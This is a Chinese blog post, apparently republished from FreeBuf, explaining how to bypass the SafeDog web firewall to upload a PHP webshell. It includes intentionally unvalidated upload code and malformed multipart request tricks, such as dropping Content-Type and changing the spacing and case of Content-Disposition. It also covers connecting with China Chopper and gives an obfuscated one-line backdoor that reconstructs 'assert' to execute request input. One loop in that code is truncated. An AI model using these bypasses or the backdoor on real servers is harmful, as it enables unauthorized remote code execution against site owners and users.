php网站安全狗绕过,绕过网站安全狗拦截,上传Webshell技巧总结 | 附免杀PHP一句话...

原标题:绕过网站安全狗拦截,上传Webshell技巧总结 | 附免杀PHP一句话

*本文原创作者:1_2,本文属FreeBuf原创奖励计划,未经许可禁止转载

这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法。

思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测。

废话不多说,切入正题。。。。

1、实验环境:

Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.12048

2、用于文件上传的PHP源码:

$path = dirname(__FILE__) . '/upload/';

$rand = rand(0,30);

move_uploaded_file($_FILES["file"]["tmp_name"],$path . $rand . $_FILES["file"]["name"]);

echo "File Path:" . $path . $rand . $_FILES["file"]["name"] . "
";

echo "OK";

?>

因为此次实验的目的是绕过网站安全狗,所以PHP源码上我没做任何检测,把上传的文件直接放在upload目录下。

3、先看一下正常的HTTP请求:

96fb7ec7008f01ff486fd942726af615.png

很明显,文件名为”yijuhua.php”被拦截。。。。

4、尝试%00截断:

e87c7c007255b3174462b139500094cc.png

很明显,失败了。。。

5、修改HTTP请求,构造畸形HTTP请求

(1)删除实体里面的Conten-Type字段:

c7601cf155200145a4ef669a4f8f23bd.png

f0a56ed644d34768198753fad772920f.png

绕过网站安全狗的拦截,成功上传WebShell。。。

(2)删除Content-Disposition字段里的空格:

8859ef99f8467f90851a4fae4bf653b0.png

1c0bb6e7909ee0463fb3d2a35453a971.png

abfbd8c6319b3f764dd41230f7ece4ec.png

(3)修改Content-Disposition字段值的大小写:

21d6b3b57879c5ec41814afdf69bd0aa.png

6、菜刀连接一句话:

2538364724f3bb724b6ecdab6501bb64.png

到此,上传WebShell结束,各位看明白了吗?

7、免杀PHP一句话:

/*

PHP一句话木马

assert($string)

*/

$arr = array('a','s','s','e','r','t');

$func = '';

for($i=0;$i

$func .= $func . $arr[$i];

}

$func($_REQUEST['c']);

?>

4c441eb1492e14eb397e3315240045c0.png

8、修复漏洞:

出现这种情况,我认为是网站安全狗在开发时没有考虑到畸形HTTP请求,而Apache却兼容畸形HTTP请求,所以能够上传成功。

*本文原创作者:1_2(QQ:965207103),本文属FreeBuf原创奖励计划,未经许可禁止转载返回搜狐,查看更多

责任编辑:

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值